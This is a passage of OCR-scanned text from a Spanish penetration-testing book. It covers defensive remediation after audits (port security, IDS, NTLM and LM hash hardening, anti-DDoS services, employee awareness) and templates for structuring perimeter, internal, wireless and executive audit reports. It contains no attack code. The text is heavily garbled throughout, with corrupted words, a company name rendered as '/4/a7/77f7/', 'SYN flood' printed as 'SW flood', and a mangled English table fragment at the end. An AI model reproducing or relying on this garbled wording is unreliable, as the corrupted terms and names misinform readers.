Mantener  los  sistemas  operativos  y  aplicaciones  actualizadas,  esta  es  una  de  las  maximas 
de  la  seguridad. 

Fortificar  y  gestionar  los  Domain  Controllers. 

-  Ehmmar  los  hashes  LM.  Este  hecho  es  dificil  hoy  en  dia  debido  a  la  compatibilidad 
hacia  atras  con  los  sistemas  operativos  antiguos  que  solo  disponian  de  este  hash  para  la 
autenticacion.  Poco  a  poco  este  riesgo  ira  disminuyendo  hasta  desaparecer. 

Para  finalizar  la  e.xposicion  de  tecnicas  de  mitigacion,  faltan  por  anadir  algunas  dc  menor  efecti  vidad. 
aunque  pueden  ayudar  bastante  a  los  administradores  a  terminal'  de  fortificar  el  entorno  empresarial. 

Deshabilitar  el  protocolo  NTLM.  Este  hecho  no  sera  posible  en  la  gran  mayoria  de 
ocasiones,  ya  que  se  requiere  un  gran  esfuerzo  por  paite  de  la  empresa,  y  la  rfectividad  puede 
ser  minima. 

-  Uso  de  smartcard y  un  segundo  factor  de  autenticacion. 

Remicio  de  equipos.  tanto  cliente  como  servidores.  Las  estaciones  de  trabajo  podran 
ser  reiniciadas  para  provocar  el  ‘Plvido  "  de  las  credenciales  cacheadas  y  disponibles  en 
memoria.  El  reinicio  de  un  servidor  es  bastante  mas  complejo,  prineipalmente  si  se  encuentra 
en  Lin  ambito  como  la  procluccion. 
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Conflguracion  de  elementos  de  seguridad  en  la  red 

Tras  realizar  la  auditona  se  puede  decidir  si  se  necesitan  elementos  de  seguridad  en  la  red,  en  fiincion 
del  exito  de  ciertas  pruebas  que  podrian  haberse  anulado  con  elementos  de  seguridad,  tales  como 
IDS^  HIDS  0  Port  Security.  Por  ello,  se  debe  analizar  la  problematica  y  decidir  que  elementos  son 
los  que  se  deberian  configurar  y  utilizar  en  la  red  corporativa. 

Una  situacion  frecuente  en  las  empresas  es  la  posibilidad  de  conectarse  a  la  red  utilizando  cualquier 
dispositive,  sobre  todo  con  la  ola  BYOD.  Habria  que  preguntarse  si  alguien  puede  entrar  en  el  edificio 
y  conectarse  con  su  equipo  a  una  "hoca  "  de  red  y  tener  acceso  a  la  red. 

Es  recomendable  utilizar  sistemas  como  port  security  o  equivalentes.  i,Que  es  esto?  Port  Security 
es  una  caracteristica  de  los  switches  que  pemiite  tener  una  asociacion  almacenada  entre  direccion 
MAC  y  Puerto  del  switch.  De  este  modo  se  permite  solamente  a  esas  direcciones  i\4AC  comunicarse 
a  traves  de  esa  "boca*'  del  switch  a  ese  equipo.  Si  un  dispositive  con  otra  direccion  MAC  intentase 
comunicarse  a  traves  de  dicha  "boca",  el  mecanismo  Port  Security  deshabilitaria  el  puerto  del 
switch  y  se  generaria  una  alerta  para  el  administrador,  por  ejemplo,  a  traves  del  protocolo  SNMP  que 
se  podria  monitorizar. 

Otra  de  las  acciones  a  realizar  es  tener  inventariado  de  todas  las  tomas  de  red  y  decidir  desconectar 
aquellas  que  no  se  utilizan.  Esto  es  algo  que  muchas  empresas  realizan  y  que  mejoran  su  seguridad 
fisica,  previniendo  que  alguien  pueda  conectarse  donde  quiera. 

Por  comodidad  se  puede  configurar  una  lista  de  direcciones  MAC  en  el  switch  para  un  puerto,  no 
tiene  por  que  ser  solamente  una.  Tambien  se  puede  configurar  las  acciones  que  se  llevaran  a  cabo  en 
caso  de  detectar  un  canibio  de  direccion  MAC. 

Otro  de  los  elementos  necesarios  en  una  red  son  los  IDS,  NIDS,  HIDS.  Tndependientemente 
del  ambito  en  el  que  se  quiera  realizar  la  deteccion  de  intrusiones  se  debe  tener  claro  que  son 
imprescindibles  hoy  en  dia.  Ademas,  ataques  sencillos  como  es  ARP  Spoofing  quedaria  detectado, 
debido  a  la  anomalia  que  genera  en  la  red. 


Inventariado  de  maquinas  y  acotar  responsabilidades 

Una  recomendacion,  ya  no  a  nivel  tecnico,  pero  que  esta  relacionado  con  la  seguridad  es  el 
inventariado  de  maquinas  en  la  organizacion.  Se  debe  disponer  de  un  invenlario  donde  se  especifiquen 
que^  maquinas  hay,  y  si  puede  ser  asociar  direcciones  a  maquinas.  Esto  ultimo  en  muchas  ocasiones 
no  puede  ser,  pero  al  menos  si  asociarlas  a  rangos  de  direcciones. 

Es  recomendable  acotar  las  responsabilidades  sobre  las  maquinas  que  pueden  aparecer  en  la 
organizacion,  teniendo  claro  quien  es  el  responsable  en  cada  area,  por  ejemplo  a  modo  de  politica 
de  seguridad.  Si  aparecen  nuevas  maquinas  que  puedan  poner  en  peligro  la  estabilidad  interna  o 
seguridad  del  segmento  de  red,  debe  existir  un  responsablede  estos  hechos,  una  figura  al  que  se 
pueda  pedir  explicaciones. 
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Evaluacion  de  redes  y  recomendacion 

Las  redes  intemas,  como  se  ha  podido  comprobar  en  este  libro,  pueden  tener  configuraciones 
erroneas  o  algunos  problemas  que  provocan  que  en  vez  de  tener  un  comportamiento  eonmutado,  este 
sea  en  modo  hub,  o  que  al  menos  hayan  paquetes  que  llegan  a  las  tarjetas  de  red  de  otros  usuarios, 
cuando  el  trafico  no  esta  dirigido  a  el,  ni  es  trafico  multicast. 

Si  este  hecho  se  detecta  en  la  organizacion  debera  infonnarse  y  recomendar  el  analisis  del  problema. 

ya  que  si  los  paquetes  llegan  a  ciertos  usuarios,  estos  podrian  utilizarlos  para  realizar  acciones 
maliciosas. 


4.Medidas  correctoras  en  auditona  de  caja  blanca 

Los  escaneres  y  las  buenas  practicas  que  conoce  el  auditor  seran  las  medidas  correctoras  una  vez 
se  detecten  problemas  de  configuracion,  permisos  no  efectivos  o  desactualizaciones  en  el  sistema. 

A  continuacion  sc  exponen  medidas  a  modo  de  checklist  que  se  pueden  enunciar  a  la  organizacion 

como  buenas  practicas  para  corregir  o  mitigar  los  fallos  de  seguridad  encontrados  en  este  tipo  de 
auditorias: 

Resolucion  inmediata  de  los  fallos  encontrados  en  la  configuracion  de  servicios  y 
pennisos.  "  " 

-  Aplicacion  de  parches  en  entomos  de  preproduccidn  para  su  posterior  aprobacion  en 
los  servidores  de  produccion.  Se  entiende  que  la  organizacion  no  aplicara  actual izaciones 
directamente  en  un  entomo  de  produccion. 

-  Revision  periodica  mediante  el  uso  de  escaneres  de  vulnerabilidades  y  de  configuracion. 

-  Minima  exposicion  de  servicios  y  aplicaciones.  En  otras  palabras,  los  servicios  y 
servidores  deberan  estar  expuestos  con  el  menor  espacio  o  conectividad  posible,  siempre  y 
cuando  no  afecte  a  la  productividad. 

Minimo  privilegio  posible.  Las  aplicaciones  y  servicios  deben  ejecutarse  con  el 
minimo  privilegio  para  poder  realizar  sus  funciones.  De  este  modo  se  evita  que  un  fallo 
de  configuracion  o  una  desactualizacion  aprovechado  no  proporcione  el  maximo  privilegio 
directamente  al  alacante. 

-  Acotar  responsabilidades  y  regislro  de  actividad.  Disponer  de  tecnologias  basadas  en  triple 
A  (Authetitication.  Authorization  and  Accounting)  con  las  que  se  separen  las  responsabilidades 
y  quede  claro  que  cosas  se  pueden  realizar  y  se  registre  o  audite  las  operaciones  realizadas. 

-  Aplicacion  de  esquemas  basados  en  la  defensa  en  profundidad,  siempre  y  cuando  sea 
posible. 
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5.  Medidas  correctoras  en  DOS/DDOS 

Cada  vez  hay  mas  empresas  que  se  dedican  a  olxecer  servicios,  tanto  de  pruebas  de  estres  contra  la 
infraestructura  de  una  organizacion  como  las  medidas  correctoras  que  se  comentaran  a  continiiacion. 
La  recomendacion  mas  eficiente  para  las  organizaciones  que  quieren  protegerse  contra  estas 
amenazas  es  la  de  utilizar  la  infraestmctura  suplementaria  que  proporcionan  las  empresas  que 
ofrecen  este  tipo  de  sei*vicios. 

En  primer  lugar  la  planificacion  de  como  deteclar  los  ataques  DDOS  y  su  mitigacion  debe  ser  una 
funcion  TJ.  For  ejernplo,  la  empresa/4/a7/77f7/ ofrece  soluciones  anti  DDOS^  mediante  una  escalabilidad 
integrada.  ^Como  lo  hacen?  La  solucion  de  Akamai  absorbe  el  trafico  DDOS  dirigido  a  la  capa  de 
red  de  la  organizacion,  como  por  ejernplo  los  ataques  SW  flood  o  UDP  flood.  La  solucion  autentica 
el  trafico  valido  en  el  perimetro  de  la  red,  siendo  esto  un  sistema  integrado  y  siempre  active. 

Estas  empresas  estan  distribuidas  geograficamente  y  permiten  una  escalabilidad  de  recursos  masiva 
cuando  detectan  el  ataque  DDOS.  Algunas  de  estas  han  llegado  a  gestionar  picos  de  trafico  de 
alrededor  de  8  Tbps.  En  lineas  generates  lo  que  realiza  empresas  como  .Akamai^  OVH,  etcetera,  son 
las  siguientes  acciones: 


-  Analisis  en  tiempo  real  del  trafico.  ^Como  detectan  el  ataque?  Un  ejernplo  seria  la 
Litilizacion  de  cierto  trafico  que  los  routers  envlan.  Esta  infonnacion  es  comparada  con  las 
firmas  de  los  ataques,  ya  que  es  un  resumen  de  lo  que  pasa  por  cada  router.  Si  la  comparacion 
es  positiva,  el  plan  de  mitigacion  se  activa  poco  tiempo  despues,  antes  de  que  el  ataque  logre 
tener  impacto. 

Aspiracion  del  trafico  entrante  al  sei'vidor  del  cliente.  Si  el  ataque  es  distribuido,  la 
empresa  que  ofrece  el  servicio  debe  aciivar  servicios  replicados  en  distintos  datacenters  con 
el  fin  de  sumar  potencia  de  absorcion  de  trafico.  En  este  punto  dependera  de  los  recursos  de 
cada  empresa,  pero  si  la  capacidad  de  absorcion  supera  los  500  Gbps  se  puede  empezar  a 
relajar. 

-  Mitigacion  del  ataque,  es  decir,  identificacion  de  lodos  los  paquetes  legitimos.  En  esta 
accion  radica  la  logica  del  anti  DDOS. 


Fig.  4.01 :  Esquema  global  anti  DDOS. 
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Por  lo  tanto  se  rccomienda  evaluar  la  posibilidad  de  contar  con  los  servicios  de  empresas  de  este 
tipo  que  protegen  contra  los  ataques  de  DDOS.^  sobre  todo  si  en  la  parte  de  la  prueba  de  estres  se  ha 
demostrado  que  se  puede  ''turn bar'*  la  organizacion. 


6.  Otras  medidas  correctoras 

Hay  nuiltitud  de  recomendaciones  que  un  auditor  puede  declarar  a  la  empresa  que  ha  auditado.  pero 
existen  algunas  especiales  basadas  en  como  la  empresa  enliende  la  seguridad,  o  como  la  empresa 
implanta  sus  medidas  de  seguridad  mas  abstractas. 

La  concienciacion  de  los  empleados  es  una  de  ellas.  eslos  deben  ser  conscientes  de  los  peligros  y 
amenazas  que  Interaet  y  las  nuevas  lecnologlas  tienen  en  la  realidad.  Es  importante  que  los  empleados 
reciban  jornadas  de  concienciacion  orienladas  a  sus  labores  y  cargos  dentro  de  la  organizacion. 

Por  ejernplo,  los  empleados  que  han  caido  como  victimas  en  las  pruebas  de  simulacion  de  APT 
debeiian  asislir  a  Joniadas  de  concienciacion  donde  se  les  moslrasen  los  peligros  del  dia  a  dia  en 
el  uso  de  Internet.  Otro  ejempio  es  la  fomiacion  que  deben  rccibir  en  tematica  de  seguridad  los 
desarrolladores  web,  los  tecnicos  que  configuran  e  implantan  sistemas,  etcetera.  Es  importante  que 
el  conocimiento  en  materia  de  seguridad  on  la  empresa  este  actualizado,  y  que  los  propios  empleados 
y  sus  responsables  esten  involucrados  en  una  politica  de  seguridad. 

Otia  lecomendacion,  que  es  bastante  importante,  es  la  realizacidn  de  varias  auditon’as  al  aho,  al 
menos  mas  de  una.  Es  entendible  que  las  empresas  deben  ajustar  los  presupuestos  y  los  recur.sos 
para  poder  realizar  las  auditorias  de  seguridad,  pero  es  reeomendable  que  en  caso  de  ser  realizadas 
poi  empresas  externas  se  deberian  llevar  a  cabo  al  menos  dos.  Tambicn  dependera  del  ambito  de  la 
empresa  y  el  negocio  de  c.sta,  ya  que  Internet  puede  ser  mas  o  menos  critico  en  funcion  del  negocio. 

Por  otro  lado,  puede  ser  interesante  eontratar  seiwicios  continuos  de  pentestin^  que  al  estar 
automatizados  permiten  que  el  valor  econdmico  disminuya.  y  se  cree  un  cfecto  cercano  a  la 
auditoria  continua.  en  la  que  los  atacantes  y  la  herramienta  de  auditoria  se  encuentran  en  un  ambito 
de  actuacidn  cercano  en  el  tiempo.  De  este  modo,  se  rebaja  mucho  el  tiempo  de  respuesta  ante 
incidentes,  ya  que  la  herramienta  podria  detectar  las  vulnerabilidades  antes  que  los  potenciales 
atacantes.  .Si  algo  es  indudable  es  que  el  servicio  continuo  disminuye  mucho  el  tiempo  de  deteccidn 
de  las  vulnerabilidades,  ya  que  con  el  modelo  clasico  las  auditorias  se  realizan  cada  aiio.  dos  voces 
al  aiio.  etcetera. 

Y  como  ultima  recomendacion.  es  muy  interesante  el  llevar  a  cabo  auditorias  y  utilizar  herramientas 
de  auditoria  automatizadas,  que  hacen  que  se  obtengan  resultados  en  un  corto  periodo  de  tiempo. 
Ademas  se  debe  realizar  una  exploracion  y  pentesting  manual,  ya  que  siempre  el  hombre  sera  mas 
fino  que  la  mk]uina  en  este  tipo  de  trabajo.  La  union  de  ambas  partes  puede  llevar  a  un  trabajo 
realmente  interesante  y  que  obtenga  un  grado  de  deteccion  alto. 
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l.Nociones  de  un  informe 

Un  informe  puede  tener  al  menos  dos  perspectivas  claras  como  son  el  punlo  de  vista  tecnico  y  el 
ejecutivo.  Sea  ciial  sea  el  infonne  qiie  se  requiera  preparar,  los  infornies  deben  dar  infoniiacion  clara 
y  estructLirada  dc  las  acciones  llevadas  a  cabo  por  el  aiidilor.  El  tipo  de  auditoria  del  que  sc  rcaliza  el 
informe  tambien  influye,  como  es  logico,  a  la  bora  de  estriicturar  la  infonnacion. 

Existcn  ciertas  partes  que  un  infonne  debe  disponer  en  todo  momento  para  su  corrccta  estructuracion 
y  entendimiento.  Independientemente  de  los  objetivos  que  cl  informe  quiera  mostrar  a  la  empresa 
que  ha  conlratado  los  servicios  de  los  auditorcs,  los  informes  deben  constar  de: 

Poitada. 

-  Control  de  versiones. 

Indice. 

Inlroduccion. 

Desarrollo. 

-  Conclusiones. 

“  Anexos  si  los  hubiera. 

La  portada  sera  generica  de  la  empresa  de  los  auditores,  es  recomcndable  insertar  el  control  de 
versiones  y  los  nombrcs  de  los  autores,  revisores  y  responsables  en  la  misma  portada.  La  fccha  es 
otra  de  las  necesidades  para  poder  verificai*  las  diferentes  versiones  en  case  de  diida. 

El  control  de  versiones  es  algo  impoitante  para  verificar  que  version  de  informe  se  esta  consultando 
en  cada  instante.  Se  detallara  mas  adelante  necesidades  de  este  componente  del  infonne. 

El  nidice  o  tabla  de  contenido  debe  proporcionar  acceso  directo  al  nuinero  de  hoja  donde  se 
enciientra  un  apaitado  de  interes  para  el  lector.  No  es  aconsejable  detallar  en  el  indice  mas  de  Ires 
niveles  de  profundidad,  aunque  existan  mas  niveles  de  profundidad  en  algun  punto  del  informe. 
Esta  recomendacion  es  por  temas  de  legibilidad  para  el  lector  y  por  el  tamano  que  pudiera  alcanzar 
el  indice. 
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La  introduccion,  en  algunos  ambitos  denominada  como  dociimento,  debe  presentar  de  nianera  clara 
y  concisa  de  que  trata  el  infonne.  Este  apartado  se  puede  desglosar  en  otros  subapartados,  o  incluso 
otros  apartados  como  son  los  objetivos  generales  del  infoiTiie,  objetivos  especificos  y  alcaiice  del 
infonne. 

El  desarrollo  del  informe  presenta  toda  la  infonnacion  sobre  las  pruebas  que  se  ban  ido  realizando  y 
los  resiiltados  obtenidos.  Puede  ser  muy  interesante  categorizar  los  resiiltados  al  final  del  desan*ollo 
del  propio  informe.  Es  impoitante  dotar  al  desarrollo  del  informe  de  un  orden  cronologico  para 
poder  seguir  las  pruebas  de  manera  mas  clara  y  concisa.  Otra  opcion  es  clasificar  el  tipo  de  prueba 
y  despues  ir  mostrando  de  manera  cronologica  el  desaiTollo  de  estas,  pero  sin  separarlas  de  su 
categoria. 

Las  conclusiones  y  recomendaciones  proporcionan  al  lector  una  sintesis  de  toda  la  auditoria  con 
las  recomendaciones  pertinentes  para  siibsanar  los  posibles  fallos  de  segiiridad  encontrados  en  el 
proceso.  Es  importante  reflejar  con  objetividad  lo  analizado  para  que  el  informe  pueda  scr  utilizado 
en  la  posible  toma  de  decisiones  de  la  organizacion  analizada. 

Los  anexos  aportan  pruebas  o  el  desarrollo  exhaustivo  de  estas  como  infonnacion  extra  que  ayude  a 
los  tecnicos  a  entender  que  se  ha  estado  realizando  sobre  la  organizacion.  Tambien  pennilen  anadir 
infonnacion  extra  sobre  categorias,  elementos.  herramientas  de  segiiridad,  medidas  de  scguridad, 
riesgos,  amenazas.  etcetera.  En  el  anc.xo  se  puede  anadir  todo  tipo  de  infonnacion  que  pueda  dar  un 
plus  al  valor  del  informe. 


2.  Plantillas 

En  este  apartado  se  presentan  diferentes  plantillas  con  las  que  ayudar  a  encarar  el  informe.  Basandose 
en  las  nociones  enunciadas  en  el  apaitado  anterior,  es  interesante  optar  por  una  escritura  clara  y 
concisa,  presentando  los  elementos  de  manera  cronologica.  desarrollando  las  pruebas  realizadas  y 
los  resultados  obtenidos  y,  por  ultimo,  presentar  las  conclusiones  y  recomendaciones. 

.A  continuacion  se  presentan  varias  plantillas  que  pueden  ayudar  a  la  confeccion  del  informe.  Se 
niLiestran  ejemplos  de  apartados  que  deben  incluirse  en  ellos  y  como  el  lector  puede  entender  lo  que 
.se  le  presenta  de  mejor  manera  siguiendo  las  nociones  presentadas  en  este  capitulo. 


Aiiditoi  la  pel  imetral 

En  un  informe  de  auditoria  perimetral  se  deben  presejitar  muchas  pruebas,  ya  que  una  auditoria  de 
este  tipo  realiza  un  gran  proceso  de  identificacion  de  activos  en  el  perimetro  de  la  organizacion.  Esla 
plantilla  pretende  sinterizar  los  apartados  de  la  siguiente  manera: 

-  Introduccion.  Si  se  entiende  un  informe  de  manera  eslructurada,  tal  y  como  se  presenta 
en  este  capitulo,  se  debe  hacer  hincapie  en  que  la  introduccion  puede  tener  varios  puntos. 
Uno  de  ellos  es  la  propia  introduccion  donde  se  especifica  que  se  ha  realizado  en  la  auditoria. 
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Existen  otros  puntos  como  puede  ser  el  objeto  del  informe,  el  alcance,  el  proyecto  con 
sus  antecedentes,  listados  de  pruebas  a  realizar,  descripciones  de  sei-vicios,  etcetera.  Para 
ejemplificar  se  proponen  estos  puntos  para  la  parte  de  introduccion. 

1.  Introduccion. 

2.  Objeto. 

3.  Proyecto. 

-  Pioiebas.  En  este  apartado  es  importante  diferenciar  entre  las  pruebas  o  tareas  llevadas 
a  cabo  para  la  recogida  de  informacion  y  su  posterior  analisis.  En  estas  pruebas  entran 
la  identificacion  de  servicios  y  analisis  do  puertos  TCP/UDP,  realizacidn  de  mapas  de 
infonnacion,  deteccidn  de  fugas  de  infonnacion,  puntos  de  entrada,  verificacidn  de  metodos, 
etcetera.  Todo  lo  que  se  ha  ido  estudiando  en  el  capitulo  donde  se  confeccionan  los  ataques. 
en  el  que  se  habla  de  la  auditoria  perimetral.  Hay  que  recordar  que  se  debe  presentar  de 
manera  cronologica,  para  que  se  pueda  entender  todo  el  procedimiento  de  manera  mas  clara 
y  concisa. 

-  La  parte  de  deteccidn  de  vulnerabilidades  presenta  las  pruebas  de  analisis  sobre  SSL^ 
manipulacidn  de  parameiros,  ataques  web.  geslidn  de  cookies,  etcetera.  Siempre  teniendo 
en  CLienta  el  orden  cronoldgico  de  actuacidn.  A  continuacidn  se  proporciona  un  niimero  de 
apartado  para  esta  plantilla  de  informe. 

4.  Recogida  y  analisis  de  informacion. 

5.  Deteccidn  y  explotacidn  de  vulnerabilidades. 

-  Conclusiones  y  recomendaciones.  En  todo  infomie  debe  encontrarsc  esta  parte  donde 
se  reune  todo  lo  encontrado  categorizado  por  criticidad.  Esta  infomiacidn  es  extendida  con 
las  recomendaciones  de  segiiridad  necesarias  para  llevar  a  cabo  un  analisis  global  de  los 
problemas  que  hay  enlorno  a  la  segiiridad  y  las  solucioncs  que  como  auditores  se  plantean. 

6.  Resumen  vulnerabilidades. 

7.  Recomendaciones  de  seguridad. 

Auditoria  interna 

En  un  informe  de  auditoria  interna  se  deben  presentar  muchas  pruebas,  aunque  muchas  van  surgiendo 
en  funcion  de  las  necesidades  del  auditory  lo  que  este  se  va  encontrando  en  su  trabajo.  Esta  plantilla 
pretende  sintetizar  los  apartados  de  la  siguiente  manera: 

Introduccion.  Al  igual  que  en  la  auditoria  perimetral,  los  informes  para  la  auditoria  interna 
contienen  una  parte  de  introduccion,  la  ciial  sera  muy  similar  para  los  infonucs  tecnicos  de 
auditoria. 

1.  Introduccion. 

2.  Objeto. 

3.  Proyecto. 

-  Pruebas.  En  este  apartado  del  informe  se  enuncian  las  pruebas  que  se  han  ido  realizando. 
Como  se  puede  visual izar  mas  adelante  existe  un  apartado  donde  se  realiza  el  seguimiento 
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marcando  iina  linea  temporal  de  los  acontedmienlos.  Se  puede  considerar  como  un  diario  en 
el  que  el  pentester  va  marcando  los  pasos  que  ha  ido  realizando  por  los  distintos  segmentos 
que  ha  ido  explorando  o  a  los  que  ha  ido  consiguiendo  acceso.  En  el  apartado  de  pruebas  se 
entiende  que  se  iran  realizando  pruebas  como  las  que  se  presentan  en  cl  capitulo  de  confeccion 
de  ataque,  en  el  apartado  dedicado  a  la  auditoria  intenia. 

4.  Paiebas. 

5.  Seguimiento  cronologico  por  segmentos. 

-  Conclusiones  y  recomendaciones.  A1  igual  que  en  la  auditoria  perimelral,  y  como 
se  ha  comentado  anteriomiente,  todo  infomie  debe  contemplar  unas  conclusiones  y 
recomendaciones  de  seguridad  finales.  En  esta  plantilla  se  anade  que,  al  ser  una  auditoria 
inlenia  se  muestren  los  objetivos  que  fueron  enunciados  en  la  parte  de  proyecto,  los  cuales 
son  logrados  durante  el  proceso  complete. 

6.  Objetivos  logrados. 

7.  Conclusiones  y  recomendaciones  de  seguridad. 


Auditoria  wireless 

En  un  intbrme  de  auditoria  wireless  se  deben  presentar  di versos  aspectos,  ya  que  una  auditoria 
dc  esle  lipo  realiza  Ires  pasos  diferenciados:  identificacion,  analisis  y  ataques.  En  el  apartado  de 
ataques,  no  solo  entra  la  comprobacion  de  la  seguridad  en  los  pimtos  de  acceso  a  la  red.  si  no  la 
utilizacion  de  tecnicas  como  Rogue  AP  para  atacar  a  clienies. 

Esta  plantilla  pretende  sintetizar  los  aparlados  de  la  siguicnle  manera: 

-  Introduccion.  Al  igual  que  en  la  auditoria  perimetral,  los  infonnes  para  la  auditoria  interna 
contienen  una  parte  de  introduccion,  la  ciial  sera  muy  similar  para  los  intormes  tecnicos  de 
auditoria. 

I.  Introduccion. 


2.  Objeto. 

3.  Proyecto. 

Pruebas.  Las  pruebas  proptiestas  para  esta  plantilla  son  estructuradas  en  distintos 
apartados:  descubrimiento,  analisis  y  ataque.  Se  deben  especificar,  como  siempre  de  manera 
cronologica.  con  detalle  las  distintas  pruebas  que  se  realizan  y  los  resultados  obtenidos. 

4.  Descubrimiento. 

5.  Analisis. 

6.  Ataques. 

-  Conclusiones  y  recomendaciones.  Como  se  ha  comentado  en  los  apartados  anteriores 
se  presentan  las  conclusiones  de  la  auditoria  haciendo  hincapie  en  los  fallos  de  seguridad 
encontrados,  a  poder  ser  clasificados  por  criticidad.  Ademas,  se  indican  recomendaciones  de 
seguridad  para  que  el  cliente  pueda  tomar  medidas. 

7.  Conclusiones  y  recomendaciones  de  seguridad. 
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3.  Control  de  cambios 

El  control  de  cambios  o  control  de  versiones  es  un  elemento  que  pemiite  identificar  la  edicion  del 
infomie  que  el  lector  esta  consultando.  Disponer  de  este  elemento  es  algo  fiindamental  para  que 
distintos  auditores  puedan  ir  modificandolo. 


CONTROL  DE  VERSIONES 

Version 

1 

2 

3 

4 

Fecha 

DD/MM/AAAA 

DD/MM/AAAA 

Tabla  5.01 :  Control  de  versiones. 


Este  elemento  esta  compuesto  por  el  numero  de  version,  el  cual  puede  ser  identificado  de  manera 
progresiva  con  niimeros  naturales,  o  bien  con  la  nomenclatura  X.X  que  cs  mas  utilizada  para  las 
versiones  de  software. 

Otro  de  los  campos  imporlantcs  de  este  elemento  es  la  fecha  en  la  que  se  ha  escrito  la  version,  ya 
que  de  este  modo  se  puede  identificar  rapidamente  el  tiempo  que  ha  transcun'ido  desde  una  version 
a  oira.  Este  dato  puede  orientar  el  numero  de  cambios  que  puede  tener  un  informe,  aunque  no  es  un 
valor  exacto. 

Otro  elemento  que  acompana  al  control  de  cambios  y  que  puede  insertarse  tambien  en  la  portada  o 
en  la  primera  pagina  del  documento  es  el  siguiente  euadro  y  datos: 

Feclia:  DD/MM/AAA 

Version:  1.0 


ELABORADO 

REVISADO 

APROBADO 

Departamento  de  Seguridad 

Departamento  de  Seguridad 

Direccion  de  Operaciones 

Consultor  de  Seguridad 

Responsable  Departamento 

Supervision 

Tabla  5.02:  Resumen  de  autores  del  documento. 


En  el  campo  fecha  se  escribe  la  fecha  actual  del  documento,  aunque  en  el  control  de  versiones 
tambien  se  idenlifica  rapidamente  ante  que  version  del  documento  se  encuentra  el  lector. 

En  el  euadro  se  especifican.  pudiendo  variar  a  lo  presentado  en  el  ejemplo.  los  autores  del  documento, 
quien  lo  ha  revisado  y  que  director  lo  ha  aprobado. 

Esto  es  totalmente  personalizable  por  los  auditores,  ya  que  dependera  de  la  jerarquia  de  la 
organizacion  que  emite  el  informe. 
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4.Ejecutivo  Vs  Tecnico 

En  muchas  ocasiones  en  vez  de  presentar  un  informe  tecnico  se  debe  presentar  ambos,  o  incliiso 
solamente  el  informe  ejecutivo.  Para  muchos  las  diferencias  son  obvias,  aunque  existen  varies 
conceptos  qiie  ambos  comparten. 

Por  un  iado,  el  informe  ejecutivo  tiene  un  caracter  de  resumen  amplio,  ya  que  su  objetivo  es  ser 
entregado  a  la  direccion  de  una  organizacion  conteniendo,  por  ejemplo,  graficos  donde  se  resume 
el  estado  de  seguridad  y  el  trabajo  realizado.  En  otras  palabras,  este  tipo  de  informes  son  cortos  y 
concisos,  y  como  se  ha  comentado  anterioiTnente,  llevan  consigo  un  resumen  de  lodo  el  trabajo 
Ilevado  a  cabo  por  el  grupo  de  auditores  y  las  medidas  correctoras  para  solucionar  o  mitigar  los 
fallos  encontrados.  Por  otro  lado  el  infoiTne  tecnico,  como  se  ha  podido  comprobar  en  apartados 
anteriores,  es  mucho  mas  extenso  y  debe  contener  la  fase  de  desaiTollo  de  pruebas  completa  y  de 
manera  cronologica.  Los  reportes  e  imagenes  detallan  lo  que  ha  hecho  el  equipo  tecnico  y  con  un 
lenguaje  entendible  por  otros  miembros  tecnicos. 


Ejemplo  ejecutivo 

En  este  ejemplo  se  presentan  partes  para  la  realizacion  de  un  informe  ejecutivo.  Una  de  las 
caracteristicas  mas  imporlantes  es  la  utilizacion  de  un  lenguaje  no  tecnico  y  totalmente  cercano  a 
directi  VOS.  Lo  importante  para  cllos  es  poder  observar  que  se  ha  dcsaiTollado,  que  se  ha  conseguido 
y  que  estaba  bien.  Con  estos  elementos  de  juicio  se  podran  tomar  decisiones  a  corto  o  medio  plazo 
sobre  los  elementos  que  no  estan  desaiTollando  correctamente  su  funcion. 

A  continuacion  se  exponen  algunos  apartados  que  pueden  aparecer  en  un  informe  ejecutivo,  aunque 
como  es  logico  son  consejos  y  pueden  eliminarse  o  ahadirse  algun  apartado  extra.  Es  importante 
recalcar  que  estos  infonnes  son  de  pocas  paginas  y  con  la  aparicion  de  graficos  como  elemento 
visual  que  presente  algunos  resultados. 

-  Antecedentes  y  motivos.  Breve  descripcion  de  los  antecedentes  que  provocan  la 
realizacion  del  trabajo,  en  otras  palabras  los  motivos  de  la  ejecucion  del  proyecto. 

Elementos.  Se  enumeran  los  elementos  de  juicio,  sin  entrar  en  detalle  en  ningun  momento. 

-  Procedimiento.  Desarrollo  de  pruebas  a  muy  alto  nivel,  sin  entrar  en  detalle  en  ningun 
momento. 

Resultados.  Presentacion,  si  puede  ser  grafica.  de  resultados  con  los  que  la  toma  de 
decisiones  pueda  ser  facilmente  entendible. 

-  Conclusiones  y  recomendaciones.  Se  presentan  conclusiones  sobre  el  trabajo  realizado  y 
las  recomendaciones  de  seguridad. 

Como  se  puede  visualizar  se  presentan  las  tres  pautas  necesarias  en  un  informe  ejecutivo.  Brevedad, 
resumen  y  datos  claros  y  entendibles  por  un  directive  para  su  toma  de  decisiones  sobre  los  hechos 
que  hicieron  que  la  auditoria  se  llevara  a  cabo. 
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5.  Reportes  automaticos 

Existen  multitud  de  herramientas  automaticas  que  pueden  ser  utilizadas  en  auditorias.  Estas 
herramientas  proporcionan  infonnes  generados  con  las  vulnerabilidades  que  se  han  obtenido.  En 
este  apartado  se  presenta  una  comparacion  entre  dos  escaneres  y  los  distintos  reportes  que  aportan. 
Los  escaneres  escogidos  son  Iron  WASP  y  ZAP. 

Para  el  ejemplo  se  va  a  utilizar  una  aplicacion  web  denominada  WAVSEP,  la  cual  puede  ser 
descargada  de  la  siguiente  URL  https://code.google.eom/p/wavsep/.  La  aplicacion  web  dispone  de 
cases  de  test  para  distintas  vulnerabilidades  como  son  XSS.  LFL  RFL  SQLi,  leakage,  etcetera.  Para 
muchos  puede  ser  una  aplicacion  mas  de  testeo  de  escaneres,  pero  aporta  casos  de  test  con  falsos 
positives  para  poder  evaluar  el  porcentaje  de  estos  en  la  que  la  herramienta  detecta  vulnerabilidad 
siendo  incorrecto. 


Analisis 

En  este  apartado  se  analiza  la  informacion  que  es  reporlada  cn  el  informe  generado  por  las 
heiramientas.  Una  vez  que  se  evalua  con  los  dos  escaneres  la  herramienta  WAVSEP.  se  puede  indicar 
que  los  reportes  son  vitales  para  la  usabilidad  de  la  infomiacion  por  parte  del  usuario  cn  un  cniorno 
laboral.  Siempre  es  un  valor  ahadido  que  una  herramienta  de  estas  permita  la  generacion  de  reportes 
y  la  exporlacion  de  datos  en  diferentes  formatos. 

Tlie  table  belov,-  5hov^*5  The  number  of  finding?  disco^'ered  m  eadihoet.  The  findings  are  seperated  based  on  flieir  tv 
Legend: 

High  High  Severity  t'ulnerability 

Medlurr.  Severity  Vulnerabilit" 

